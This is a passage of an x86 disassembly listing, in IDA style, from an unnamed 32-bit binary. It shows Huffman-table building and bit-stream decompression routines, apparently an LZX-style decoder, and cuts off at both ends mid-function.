mov esi, [ebp+var_4]
push 23h
pop ecx
sub ecx, ebx
shr esi, cl
lea ecx, [ebx-3]
shl [ebp+var_4], cl
mov ebx, [ebp+arg_4]
mov cl, 3
sub cl, ds:byte_1001278[ebx]
add al, cl
test al, al
jg short loc_10052A1
xor ebx, ebx
mov bh, [edi+1]
xor ecx, ecx
mov cl, al
mov bl, [edi]
neg ecx
shl ebx, cl
or [ebp+var_4], ebx
inc edi
inc edi
add al, 10h
jmp short loc_10052A1
; ---------------------------------------------------------------------------
loc_100529F: ; CODE XREF: sub_10050EA+17A�j
xor esi, esi
loc_10052A1: ; CODE XREF: sub_10050EA+19B�j
; sub_10050EA+1B3�j
mov ecx, [ebp+arg_4]
mov ecx, ds:dword_10012B0[ecx*4]
lea esi, [ecx+esi*8]
mov ecx, [ebp+var_4]
shr ecx, 19h
movsx ecx, byte ptr [ecx+edx+0DB4h]
mov [ebp+arg_4], ecx
mov cl, [ecx+edx+0E34h]
shl [ebp+var_4], cl
mov ecx, [ebp+arg_4]
sub al, [ecx+edx+0E34h]
test al, al
jg short loc_10052ED
xor ebx, ebx
mov bh, [edi+1]
xor ecx, ecx
mov cl, al
mov bl, [edi]
neg ecx
shl ebx, cl
or [ebp+var_4], ebx
inc edi
inc edi
add al, 10h
loc_10052ED: ; CODE XREF: sub_10050EA+1EB�j
add esi, [ebp+arg_4]
jmp short loc_100533A
; ---------------------------------------------------------------------------
loc_10052F2: ; CODE XREF: sub_10050EA+16C�j
test cl, cl
jz short loc_1005337
mov esi, [ebp+var_4]
movzx ebx, cl
push 20h
pop ecx
sub ecx, ebx
shr esi, cl
mov ecx, ebx
shl [ebp+var_4], cl
mov ecx, [ebp+arg_4]
sub al, ds:byte_1001278[ecx]
test al, al
jg short loc_100532B
xor ebx, ebx
mov bh, [edi+1]
xor ecx, ecx
mov cl, al
mov bl, [edi]
neg ecx
shl ebx, cl
or [ebp+var_4], ebx
inc edi
inc edi
add al, 10h
loc_100532B: ; CODE XREF: sub_10050EA+229�j
mov ecx, [ebp+arg_4]
add esi, ds:dword_10012B0[ecx*4]
jmp short loc_100533A
; ---------------------------------------------------------------------------
loc_1005337: ; CODE XREF: sub_10050EA+20A�j
xor esi, esi
inc esi
loc_100533A: ; CODE XREF: sub_10050EA+206�j
; sub_10050EA+24B�j
mov ecx, [edx+10h]
mov [edx+14h], ecx
mov ecx, [edx+0Ch]
mov [edx+10h], ecx
jmp short loc_1005357
; ---------------------------------------------------------------------------
loc_1005348: ; CODE XREF: sub_10050EA+15A�j
test bl, bl
lea ecx, [edx+ecx*4+0Ch]
mov esi, [ecx]
jz short loc_100535A
mov ebx, [edx+0Ch]
mov [ecx], ebx
loc_1005357: ; CODE XREF: sub_10050EA+25C�j
mov [edx+0Ch], esi
loc_100535A: ; CODE XREF: sub_10050EA+266�j
mov ecx, [ebp+arg_0]
add [ebp+var_8], 2
mov ebx, ecx
sub ebx, esi
mov [ebp+arg_4], ebx
loc_1005368: ; CODE XREF: sub_10050EA+2AF�j
mov esi, [ebp+arg_4]
and esi, [edx+8]
cmp ecx, 101h
mov ebx, [ebp+var_C]
mov bl, [esi+ebx]
mov esi, [ebp+var_C]
mov byte ptr [ebp+arg_0+3], bl
mov [esi+ecx], bl
jge short loc_100538E
mov esi, [edx+4]
add esi, [ebp+var_C]
mov [esi+ecx], bl
loc_100538E: ; CODE XREF: sub_10050EA+299�j
inc ecx
inc [ebp+arg_4]
dec [ebp+var_8]
cmp [ebp+var_8], 0
jg short loc_1005368
loc_100539B: ; CODE XREF: sub_10050EA+C8�j
cmp ecx, [ebp+var_18]
mov esi, [ebp+var_4]
mov [ebp+arg_0], ecx
jl loc_1005126
loc_10053AA: ; CODE XREF: sub_10050EA+36�j
mov [edx+2EB4h], al
mov [edx+2EB0h], esi
mov [edx+2B04h], edi
mov eax, ecx
loc_10053BE: ; CODE XREF: sub_10050EA+2DE�j
pop edi
pop esi
pop ebx
leave
retn 8
; ---------------------------------------------------------------------------
loc_10053C5: ; CODE XREF: sub_10050EA+70�j
or eax, 0FFFFFFFFh
jmp short loc_10053BE
sub_10050EA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10053CA proc near ; CODE XREF: sub_10056D5+41�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 18h
mov edx, [ebp+arg_0]
mov ecx, [edx+2B08h]
mov al, [edx+2EB4h]
mov [ebp+var_18], ecx
mov ecx, [edx]
push ebx
mov ebx, [ebp+arg_4]
mov [ebp+var_10], ecx
mov ecx, [ebp+arg_8]
add ecx, ebx
cmp ebx, ecx
push esi
push edi
mov edi, [edx+2B04h]
mov byte ptr [ebp+arg_0+3], al
mov eax, [edx+2EB0h]
mov [ebp+var_14], ecx
jge loc_10056A4
loc_100540C: ; CODE XREF: sub_10053CA+2D4�j
mov ecx, eax
shr ecx, 16h
movsx esi, word ptr [edx+ecx*2+18h]
test esi, esi
mov [ebp+var_8], esi
jge short loc_1005443
mov ecx, 200000h
loc_1005422: ; CODE XREF: sub_10053CA+74�j
neg esi
test ecx, eax
jz short loc_1005432
movsx esi, word ptr [edx+esi*4+0E3Eh]
jmp short loc_100543A
; ---------------------------------------------------------------------------
loc_1005432: ; CODE XREF: sub_10053CA+5C�j
movsx esi, word ptr [edx+esi*4+0E3Ch]
loc_100543A: ; CODE XREF: sub_10053CA+66�j
shr ecx, 1
test esi, esi
jl short loc_1005422
mov [ebp+var_8], esi
loc_1005443: ; CODE XREF: sub_10053CA+51�j
cmp edi, [ebp+var_18]
jnb loc_10056D0
mov cl, [esi+edx+0A18h]
mov bl, byte ptr [ebp+arg_0+3]
sub bl, cl
shl eax, cl
test bl, bl
mov byte ptr [ebp+arg_8+3], cl
mov byte ptr [ebp+arg_0+3], bl
jg short loc_1005486
xor ecx, ecx
mov ch, [edi+1]
mov cl, [edi]
mov [ebp+arg_8], ecx
xor ecx, ecx
mov cl, bl
mov ebx, [ebp+arg_8]
neg ecx
shl ebx, cl
or eax, ebx
mov bl, byte ptr [ebp+arg_0+3]
inc edi
inc edi
add bl, 10h
mov byte ptr [ebp+arg_0+3], bl
loc_1005486: ; CODE XREF: sub_10053CA+98�j
mov ecx, [ebp+var_8]
sub ecx, 100h
mov [ebp+var_8], ecx
jns short loc_10054A3
mov ebx, [ebp+arg_4]
mov esi, [ebp+var_10]
mov [esi+ebx], cl
inc ebx
jmp loc_1005698
; ---------------------------------------------------------------------------
loc_10054A3: ; CODE XREF: sub_10053CA+C8�j
and ecx, 7
cmp ecx, 7
mov [ebp+var_4], ecx
jnz short loc_1005520
mov ecx, eax
shr ecx, 18h
movsx esi, word ptr [edx+ecx*2+818h]
test esi, esi
mov [ebp+var_4], esi
jge short loc_10054E8
mov ecx, 800000h
loc_10054C7: ; CODE XREF: sub_10053CA+119�j
neg esi
test ecx, eax
jz short loc_10054D7
movsx esi, word ptr [edx+esi*4+233Eh]
jmp short loc_10054DF
; ---------------------------------------------------------------------------
loc_10054D7: ; CODE XREF: sub_10053CA+101�j
movsx esi, word ptr [edx+esi*4+233Ch]
loc_10054DF: ; CODE XREF: sub_10053CA+10B�j
shr ecx, 1
test esi, esi
jl short loc_10054C7
mov [ebp+var_4], esi
loc_10054E8: ; CODE XREF: sub_10053CA+F6�j
mov cl, [esi+edx+0CB8h]
sub bl, cl
shl eax, cl
test bl, bl
mov byte ptr [ebp+arg_0+3], bl
jg short loc_100551C
xor ecx, ecx
mov ch, [edi+1]
mov cl, [edi]
mov [ebp+arg_8], ecx
xor ecx, ecx
mov cl, bl
mov ebx, [ebp+arg_8]
neg ecx
shl ebx, cl
or eax, ebx
mov bl, byte ptr [ebp+arg_0+3]
inc edi
inc edi
add bl, 10h
mov byte ptr [ebp+arg_0+3], bl
loc_100551C: ; CODE XREF: sub_10053CA+12E�j
add [ebp+var_4], 7
loc_1005520: ; CODE XREF: sub_10053CA+E2�j
mov ecx, [ebp+var_8]
sar ecx, 3
cmp cl, 2
jle loc_1005658
movsx ecx, cl
mov [ebp+var_8], ecx
mov cl, ds:byte_1001278[ecx]
cmp cl, 3
mov byte ptr [ebp+arg_8+3], cl
jb loc_10055EF
movzx esi, cl
lea ecx, [esi-3]
test ecx, ecx
mov [ebp+var_C], esi
jz loc_10055EB
push 23h
pop ecx
sub ecx, esi
mov esi, eax
shr esi, cl
mov ecx, [ebp+var_C]
add ecx, 0FFFFFFFDh
shl eax, cl
mov cl, 3
sub cl, byte ptr [ebp+arg_8+3]
add byte ptr [ebp+arg_0+3], cl
cmp byte ptr [ebp+arg_0+3], 0
jg short loc_100558F
xor ebx, ebx
mov bh, [edi+1]
xor ecx, ecx
mov cl, byte ptr [ebp+arg_0+3]
mov bl, [edi]
neg ecx
shl ebx, cl
or eax, ebx
inc edi
inc edi
add byte ptr [ebp+arg_0+3], 10h
loc_100558F: ; CODE XREF: sub_10053CA+1AB�j
mov bl, byte ptr [ebp+arg_0+3]
loc_1005592: ; CODE XREF: sub_10053CA+223�j
mov ecx, [ebp+var_8]
mov ecx, ds:dword_10012B0[ecx*4]
lea esi, [ecx+esi*8]
mov ecx, eax
shr ecx, 19h
movsx ecx, byte ptr [ecx+edx+0DB4h]
mov [ebp+arg_8], ecx
mov cl, [ecx+edx+0E34h]
shl eax, cl
mov ecx, [ebp+arg_8]
sub bl, [ecx+edx+0E34h]
test bl, bl
mov byte ptr [ebp+arg_0+3], bl
jg short loc_10055E6
xor ecx, ecx
mov ch, [edi+1]
mov cl, [edi]
mov [ebp+var_C], ecx
xor ecx, ecx
mov cl, bl
mov ebx, [ebp+var_C]
neg ecx
shl ebx, cl
or eax, ebx
inc edi
inc edi
add byte ptr [ebp+arg_0+3], 10h
loc_10055E6: ; CODE XREF: sub_10053CA+1FD�j
add esi, [ebp+arg_8]
jmp short loc_100564A
; ---------------------------------------------------------------------------
loc_10055EB: ; CODE XREF: sub_10053CA+188�j
xor esi, esi
jmp short loc_1005592
; ---------------------------------------------------------------------------
loc_10055EF: ; CODE XREF: sub_10053CA+177�j
test cl, cl
jz short loc_1005640
movzx esi, cl
push 20h
mov [ebp+var_C], esi
pop ecx
sub ecx, esi
mov esi, eax
shr esi, cl
mov ecx, [ebp+var_C]
shl eax, cl
mov ecx, [ebp+var_8]
sub bl, ds:byte_1001278[ecx]
test bl, bl
mov byte ptr [ebp+arg_0+3], bl
jg short loc_1005634
xor ecx, ecx
mov ch, [edi+1]
mov cl, [edi]
mov [ebp+arg_8], ecx
xor ecx, ecx
mov cl, bl
mov ebx, [ebp+arg_8]
neg ecx
shl ebx, cl
or eax, ebx
inc edi
inc edi
add byte ptr [ebp+arg_0+3], 10h
loc_1005634: ; CODE XREF: sub_10053CA+24B�j
mov ecx, [ebp+var_8]
add esi, ds:dword_10012B0[ecx*4]
jmp short loc_100564A
; ---------------------------------------------------------------------------
loc_1005640: ; CODE XREF: sub_10053CA+227�j
mov ecx, [ebp+var_8]
mov esi, ds:dword_10012B0[ecx*4]
loc_100564A: ; CODE XREF: sub_10053CA+21F�j
; sub_10053CA+274�j
mov ecx, [edx+10h]
mov [edx+14h], ecx
mov ecx, [edx+0Ch]
mov [edx+10h], ecx
jmp short loc_100566A
; ---------------------------------------------------------------------------
loc_1005658: ; CODE XREF: sub_10053CA+15F�j
test cl, cl
movsx esi, cl
lea ebx, [edx+esi*4+0Ch]
mov esi, [ebx]
jz short loc_100566D
mov ecx, [edx+0Ch]
mov [ebx], ecx
loc_100566A: ; CODE XREF: sub_10053CA+28C�j
mov [edx+0Ch], esi
loc_100566D: ; CODE XREF: sub_10053CA+299�j
mov ebx, [ebp+arg_4]
add [ebp+var_4], 2
mov ecx, ebx
sub ecx, esi
and ecx, [edx+8]
mov esi, [ebp+var_10]
add ecx, esi
mov [ebp+arg_4], ecx
loc_1005683: ; CODE XREF: sub_10053CA+2CC�j
mov ecx, [ebp+arg_4]
mov cl, [ecx]
mov [esi+ebx], cl
inc ebx
inc [ebp+arg_4]
dec [ebp+var_4]
cmp [ebp+var_4], 0
jg short loc_1005683
loc_1005698: ; CODE XREF: sub_10053CA+D4�j
cmp ebx, [ebp+var_14]
mov [ebp+arg_4], ebx
jl loc_100540C
loc_10056A4: ; CODE XREF: sub_10053CA+3C�j
mov cl, byte ptr [ebp+arg_0+3]
mov [edx+2EB0h], eax
mov eax, [edx+8]
and eax, ebx
mov [edx+2EC0h], eax
mov eax, ebx
sub eax, [ebp+var_14]
mov [edx+2EB4h], cl
mov [edx+2B04h], edi
loc_10056C9: ; CODE XREF: sub_10053CA+309�j
pop edi
pop esi
pop ebx
leave
retn 0Ch
; ---------------------------------------------------------------------------
loc_10056D0: ; CODE XREF: sub_10053CA+7C�j
or eax, 0FFFFFFFFh
jmp short loc_10056C9
sub_10053CA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10056D5 proc near ; CODE XREF: sub_10047F7+184�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov edx, [ebp+arg_0]
push esi
mov esi, [ebp+arg_4]
mov eax, 101h
cmp esi, eax
jge short loc_1005711
sub eax, esi
cmp eax, [ebp+arg_8]
jl short loc_10056F2
mov eax, [ebp+arg_8]
loc_10056F2: ; CODE XREF: sub_10056D5+18�j
push eax
push esi
call sub_10050EA
sub esi, eax
add [ebp+arg_8], esi
cmp [ebp+arg_8], 0
mov esi, eax
mov [edx+2EC0h], eax
jg short loc_1005711
mov eax, [ebp+arg_8]
jmp short loc_100571B
; ---------------------------------------------------------------------------
loc_1005711: ; CODE XREF: sub_10056D5+11�j
; sub_10056D5+35�j
push [ebp+arg_8]
push esi
push edx
call sub_10053CA
loc_100571B: ; CODE XREF: sub_10056D5+3A�j
pop esi
pop ebp
retn 0Ch
sub_10056D5 endp
; =============== S U B R O U T I N E =======================================
sub_1005720 proc near ; CODE XREF: sub_10047F7+205�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_0]
push edi
mov edi, [eax+2B0Ch]
test edi, edi
jz short loc_1005769
mov ecx, [esp+4+arg_4]
mov edx, ecx
push esi
mov esi, [esp+8+arg_8]
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
cmp dword ptr [eax+2EC4h], 0
pop esi
jz short loc_1005769
cmp dword ptr [eax+2ECCh], 8000h
jnb short loc_1005769
push edx
push dword ptr [eax+2B0Ch]
push eax
call sub_1004749
loc_1005769: ; CODE XREF: sub_1005720+D�j
; sub_1005720+2E�j ...
pop edi
retn 0Ch
sub_1005720 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_100576D proc near ; CODE XREF: sub_1005978+1A�p
; sub_1005978+44�p ...
var_2D8 = word ptr -2D8h
var_D8 = word ptr -0D8h
var_D6 = word ptr -0D6h
var_1C = byte ptr -1Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 2D8h
push esi
push edi
xor esi, esi
loc_100577A: ; CODE XREF: sub_100576D+1F�j
push 4
push [ebp+arg_0]
call sub_1004B04
mov [ebp+esi+var_1C], al
inc esi
cmp esi, 14h
jl short loc_100577A
mov edi, [ebp+arg_0]
cmp dword ptr [edi+2EBCh], 0
jz short loc_10057A1
xor eax, eax
jmp loc_100596E
; ---------------------------------------------------------------------------
loc_10057A1: ; CODE XREF: sub_100576D+2B�j
push ebx
lea eax, [ebp+var_D8]
push eax
lea eax, [ebp+var_2D8]
push eax
push 8
lea eax, [ebp+var_1C]
push eax
push 14h
push edi
call sub_1005A76
xor esi, esi
cmp [ebp+arg_4], esi
jle loc_1005962
loc_10057C9: ; CODE XREF: sub_100576D+1EF�j
mov ecx, [edi+2EB0h]
mov eax, ecx
shr eax, 18h
xor ebx, ebx
mov bx, [ebp+eax*2+var_2D8]
test bx, bx
jge short loc_100580C
mov eax, 800000h
loc_10057E8: ; CODE XREF: sub_100576D+9D�j
neg ebx
movsx edx, bx
xor ebx, ebx
test ecx, eax
jz short loc_10057FD
mov bx, [ebp+edx*4+var_D6]
jmp short loc_1005805
; ---------------------------------------------------------------------------
loc_10057FD: ; CODE XREF: sub_100576D+84�j
mov bx, [ebp+edx*4+var_D8]
loc_1005805: ; CODE XREF: sub_100576D+8E�j
shr eax, 1
test bx, bx
jl short loc_10057E8
loc_100580C: ; CODE XREF: sub_100576D+74�j
movsx eax, bx
mov [ebp+var_4], eax
movzx eax, [ebp+eax+var_1C]
push eax
push edi
call sub_1004A61
cmp dword ptr [edi+2EBCh], 0
jnz loc_1005974
cmp bx, 11h
jnz short loc_1005873
push 4
push edi
call sub_1004B04
movzx edx, al
add edx, 4
loc_100583F: ; CODE XREF: sub_100576D+11A�j
lea eax, [edx+esi]
cmp eax, [ebp+arg_4]
jl short loc_100584C
mov edx, [ebp+arg_4]
sub edx, esi
loc_100584C: ; CODE XREF: sub_100576D+D8�j
test edx, edx
jle short loc_100586D
mov eax, [ebp+arg_C]
mov ecx, edx
mov ebx, ecx
shr ecx, 2
lea edi, [esi+eax]
xor eax, eax
rep stosd
mov ecx, ebx
and ecx, 3
rep stosb
mov edi, [ebp+arg_0]
add esi, edx
loc_100586D: ; CODE XREF: sub_100576D+E1�j
dec esi
jmp loc_1005958
; ---------------------------------------------------------------------------
loc_1005873: ; CODE XREF: sub_100576D+C2�j
cmp bx, 12h
jnz short loc_1005889
push 5
push edi
call sub_1004B04
movzx edx, al
add edx, 14h
jmp short loc_100583F
; ---------------------------------------------------------------------------
loc_1005889: ; CODE XREF: sub_100576D+10A�j
cmp bx, 13h
jnz loc_1005942
push 1
push edi
call sub_1004B04
movzx ebx, al
add ebx, 4
lea eax, [ebx+esi]
cmp eax, [ebp+arg_4]
mov [ebp+var_4], ebx
jl short loc_10058B4
mov ebx, [ebp+arg_4]
sub ebx, esi
mov [ebp+var_4], ebx
loc_10058B4: ; CODE XREF: sub_100576D+13D�j
mov edi, [edi+2EB0h]
mov eax, edi
shr eax, 18h
movsx eax, [ebp+eax*2+var_2D8]
test ax, ax
jge short loc_10058F3
mov ecx, 800000h
loc_10058D1: ; CODE XREF: sub_100576D+184�j
neg eax
test edi, ecx
movsx eax, ax
jz short loc_10058E4
movsx eax, [ebp+eax*4+var_D6]
jmp short loc_10058EC
; ---------------------------------------------------------------------------
loc_10058E4: ; CODE XREF: sub_100576D+16B�j
movsx eax, [ebp+eax*4+var_D8]
loc_10058EC: ; CODE XREF: sub_100576D+175�j
shr ecx, 1
test ax, ax
jl short loc_10058D1
loc_10058F3: ; CODE XREF: sub_100576D+15D�j
movsx edi, ax
movzx eax, [ebp+edi+var_1C]
push eax
push [ebp+arg_0]
call sub_1004A61
mov eax, [ebp+arg_8]
movzx eax, byte ptr [esi+eax]
sub eax, edi
test ebx, ebx
mov al, ds:byte_100138D[eax]
jle short loc_100593C
mov ecx, [ebp+arg_C]
lea edi, [esi+ecx]
mov ecx, ebx
mov bl, al
mov bh, bl
mov edx, ecx
shr ecx, 2
mov eax, ebx
shl eax, 10h
mov ax, bx
rep stosd
mov ecx, edx
and ecx, 3
add esi, [ebp+var_4]
rep stosb
loc_100593C: ; CODE XREF: sub_100576D+1A8�j
mov edi, [ebp+arg_0]
dec esi
jmp short loc_1005958
; ---------------------------------------------------------------------------
loc_1005942: ; CODE XREF: sub_100576D+120�j
mov eax, [ebp+arg_8]
movzx eax, byte ptr [esi+eax]
sub eax, [ebp+var_4]
mov ecx, [ebp+arg_C]
mov al, ds:byte_100138D[eax]
mov [esi+ecx], al
loc_1005958: ; CODE XREF: sub_100576D+101�j
; sub_100576D+1D3�j
inc esi
cmp esi, [ebp+arg_4]
jl loc_10057C9
loc_1005962: ; CODE XREF: sub_100576D+56�j
xor eax, eax
cmp [edi+2EBCh], eax
setz al
loc_100596D: ; CODE XREF: sub_100576D+209�j
pop ebx
loc_100596E: ; CODE XREF: sub_100576D+2F�j
pop edi
pop esi
leave
retn 10h
; ---------------------------------------------------------------------------
loc_1005974: ; CODE XREF: sub_100576D+B8�j
xor eax, eax
jmp short loc_100596D
sub_100576D endp
; =============== S U B R O U T I N E =======================================
sub_1005978 proc near ; CODE XREF: sub_10047F7+149�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push edi
lea edi, [esi+0A18h]
push edi
lea eax, [esi+2B14h]
push eax
push 100h
push esi
call sub_100576D
test eax, eax
jnz short loc_10059A2
loc_100599B: ; CODE XREF: sub_1005978+4B�j
; sub_1005978+72�j
xor eax, eax
jmp loc_1005A2A
; ---------------------------------------------------------------------------
loc_10059A2: ; CODE XREF: sub_1005978+21�j
lea eax, [esi+0B18h]
push eax
lea eax, [esi+2C14h]
push eax
movzx eax, byte ptr [esi+2EB5h]
shl eax, 3
push eax
push esi
call sub_100576D
test eax, eax
jz short loc_100599B
lea eax, [esi+0E3Ch]
push eax
lea eax, [esi+18h]
push eax
movzx eax, byte ptr [esi+2EB5h]
push 0Ah
push edi
lea eax, ds:100h[eax*8]
push eax
push esi
call sub_1005A76
test eax, eax
jz short loc_100599B
push ebx
lea edi, [esi+0CB8h]
push edi
lea eax, [esi+2DB4h]
push eax
mov ebx, 0F9h
push ebx
push esi
call sub_100576D
test eax, eax
jz short loc_1005A29
lea eax, [esi+233Ch]
push eax
lea eax, [esi+818h]
push eax
push 8
push edi
push ebx
push esi
call sub_1005A76
neg eax
sbb eax, eax
neg eax
loc_1005A29: ; CODE XREF: sub_1005978+91�j
pop ebx
loc_1005A2A: ; CODE XREF: sub_1005978+25�j
pop edi
pop esi
retn 4
sub_1005978 endp
; =============== S U B R O U T I N E =======================================
sub_1005A2F proc near ; CODE XREF: sub_10047F7+E2�p
arg_0 = dword ptr 4
push ebx
push esi
mov esi, [esp+8+arg_0]
push edi
xor edi, edi
lea ebx, [esi+0E34h]
loc_1005A3E: ; CODE XREF: sub_1005A2F+1E�j
push 3
push esi
call sub_1004B04
mov [ebx+edi], al
inc edi
cmp edi, 8
jl short loc_1005A3E
cmp dword ptr [esi+2EBCh], 0
jz short loc_1005A5C
xor eax, eax
jmp short loc_1005A70
; ---------------------------------------------------------------------------
loc_1005A5C: ; CODE XREF: sub_1005A2F+27�j
lea eax, [esi+0DB4h]
push eax
push ebx
push esi
call sub_1005C73
neg eax
sbb eax, eax
neg eax
loc_1005A70: ; CODE XREF: sub_1005A2F+2B�j
pop edi
pop esi
pop ebx
retn 4
sub_1005A2F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=60h
sub_1005A76 proc near ; CODE XREF: sub_100576D+4C�p
; sub_1005978+6B�p ...
var_A4 = dword ptr -0A4h
var_A0 = dword ptr -0A0h
var_9C = byte ptr -9Ch
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = byte ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
lea ebp, [esp-60h]
sub esp, 0A0h
push esi
push edi
push 10h
xor eax, eax
pop ecx
lea edi, [ebp+60h+var_9C]
rep stosd
xor esi, esi
xor ecx, ecx
cmp [ebp+60h+arg_4], esi
jbe short loc_1005AA9
loc_1005A96: ; CODE XREF: sub_1005A76+31�j
mov eax, [ebp+60h+arg_8]
movzx eax, byte ptr [ecx+eax]
lea eax, [ebp+eax*4+60h+var_A0]
inc dword ptr [eax]
inc ecx
cmp ecx, [ebp+60h+arg_4]
jb short loc_1005A96
loc_1005AA9: ; CODE XREF: sub_1005A76+1E�j
xor edx, edx
inc edx
mov [ebp+60h+var_58], esi
mov eax, edx
loc_1005AB1: ; CODE XREF: sub_1005A76+52�j
mov edi, [ebp+eax*4+60h+var_A0]
push 10h
pop ecx
sub ecx, eax
shl edi, cl
add edi, [ebp+eax*4+60h+var_5C]
inc eax
cmp eax, 10h
mov [ebp+eax*4+60h+var_5C], edi
jbe short loc_1005AB1
cmp [ebp+60h+var_18], 10000h
jz short loc_1005B04
cmp [ebp+60h+var_18], esi
jnz short loc_1005AFD
mov cl, [ebp+60h+arg_C]
mov edi, [ebp+60h+arg_10]
mov eax, edx
shl eax, cl
shl eax, 1
mov ecx, eax
mov esi, ecx
shr ecx, 2
xor eax, eax
rep stosd
mov ecx, esi
and ecx, 3
rep stosb
mov eax, edx
jmp loc_1005C66
; ---------------------------------------------------------------------------
loc_1005AFD: ; CODE XREF: sub_1005A76+60�j
xor eax, eax
jmp loc_1005C66
; ---------------------------------------------------------------------------
loc_1005B04: ; CODE XREF: sub_1005A76+5B�j
movzx esi, [ebp+60h+arg_C]
push ebx
mov bl, 10h
sub bl, [ebp+60h+arg_C]
cmp esi, edx
mov eax, edx
mov [ebp+60h+var_10], esi
jb short loc_1005B39
lea edi, [esi-1]
loc_1005B1A: ; CODE XREF: sub_1005A76+BC�j
movzx ecx, bl
lea edx, [ebp+eax*4+60h+var_5C]
shr dword ptr [edx], cl
xor edx, edx
inc edx
mov ecx, edi
shl edx, cl
inc eax
dec edi
cmp eax, esi
mov [ebp+eax*4+60h+var_A4], edx
jbe short loc_1005B1A
cmp eax, 10h
ja short loc_1005B4E
loc_1005B39: ; CODE XREF: sub_1005A76+9F�j
push 10h
pop ecx
sub ecx, eax
loc_1005B3E: ; CODE XREF: sub_1005A76+D6�j
xor edx, edx
inc edx
shl edx, cl
inc eax
dec ecx
cmp eax, 10h
mov [ebp+eax*4+60h+var_A4], edx
jbe short loc_1005B3E
loc_1005B4E: ; CODE XREF: sub_1005A76+C1�j
mov edx, [ebp+esi*4+60h+var_58]
movzx ecx, bl
mov ebx, [ebp+60h+arg_10]
shr edx, cl
mov [ebp+60h+var_14], ecx
cmp edx, 10000h
jz short loc_1005B85
xor eax, eax
inc eax
mov ecx, esi
shl eax, cl
lea edi, [ebx+edx*2]
sub eax, edx
shl eax, 1
mov ecx, eax
mov edx, ecx
shr ecx, 2
xor eax, eax
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
loc_1005B85: ; CODE XREF: sub_1005A76+ED�j
mov ecx, [ebp+60h+arg_4]
xor eax, eax
test ecx, ecx
mov [ebp+60h+var_8], ecx
mov [ebp+60h+var_C], eax
jle loc_1005C62
loc_1005B98: ; CODE XREF: sub_1005A76+1E6�j
mov ecx, [ebp+60h+arg_8]
mov al, [eax+ecx]
test al, al
jz loc_1005C52
movzx ecx, al
shl ecx, 2
mov edx, [ebp+ecx+60h+var_A0]
lea esi, [ebp+ecx+60h+var_5C]
mov edi, [esi]
add edx, edi
cmp al, [ebp+60h+arg_C]
ja short loc_1005BF8
mov ecx, [ebp+60h+var_10]
xor eax, eax
inc eax
shl eax, cl
cmp edx, eax
ja loc_1005C6F
cmp edi, edx
jnb short loc_1005BF4
mov eax, [ebp+60h+var_C]
lea ebx, [ebx+edi*2]
mov ecx, edx
sub ecx, edi
mov edi, ebx
mov bx, ax
shl ebx, 10h
mov bx, ax
shr ecx, 1
mov eax, ebx
mov ebx, [ebp+60h+arg_10]
rep stosd
adc ecx, ecx
rep stosw
loc_1005BF4: ; CODE XREF: sub_1005A76+159�j
mov [esi], edx
jmp short loc_1005C52
; ---------------------------------------------------------------------------
loc_1005BF8: ; CODE XREF: sub_1005A76+145�j
mov ecx, [ebp+60h+var_14]
sub al, [ebp+60h+arg_C]
mov [esi], edx
mov edx, edi
shr edx, cl
mov ecx, [ebp+60h+var_10]
mov [ebp+60h+var_1], al
shl edi, cl
lea edx, [ebx+edx*2]
loc_1005C0F: ; CODE XREF: sub_1005A76+1D3�j
mov ecx, [ebp+60h+arg_14]
xor esi, esi
cmp [edx], si
jnz short loc_1005C33
mov eax, [ebp+60h+var_8]
shl eax, 2
mov [eax+ecx+2], si
mov [eax+ecx], si
mov eax, [ebp+60h+var_8]
neg eax
inc [ebp+60h+var_8]
mov [edx], ax
loc_1005C33: ; CODE XREF: sub_1005A76+1A1�j
movsx eax, word ptr [edx]
shl eax, 2
sub ecx, eax
cmp di, si
jge short loc_1005C42
inc ecx
inc ecx
loc_1005C42: ; CODE XREF: sub_1005A76+1C8�j
shl edi, 1
dec [ebp+60h+var_1]
mov edx, ecx
jnz short loc_1005C0F
mov ax, word ptr [ebp+60h+var_C]
mov [edx], ax
loc_1005C52: ; CODE XREF: sub_1005A76+12A�j
; sub_1005A76+180�j
mov eax, [ebp+60h+var_C]
inc eax
cmp eax, [ebp+60h+arg_4]
mov [ebp+60h+var_C], eax
jl loc_1005B98
loc_1005C62: ; CODE XREF: sub_1005A76+11C�j
xor eax, eax
inc eax
loc_1005C65: ; CODE XREF: sub_1005A76+1FB�j
pop ebx
loc_1005C66: ; CODE XREF: sub_1005A76+82�j
; sub_1005A76+89�j
pop edi
pop esi
add ebp, 60h
leave
retn 18h
; ---------------------------------------------------------------------------
loc_1005C6F: ; CODE XREF: sub_1005A76+151�j
xor eax, eax
jmp short loc_1005C65
sub_1005A76 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1005C73 proc near ; CODE XREF: sub_1005A2F+36�p
var_50 = byte ptr -50h
var_4E = word ptr -4Eh
var_4C = word ptr -4Ch
var_2E = word ptr -2Eh
var_2C = word ptr -2Ch
var_2A = word ptr -2Ah
var_1C = byte ptr -1Ch
var_8 = dword ptr -8
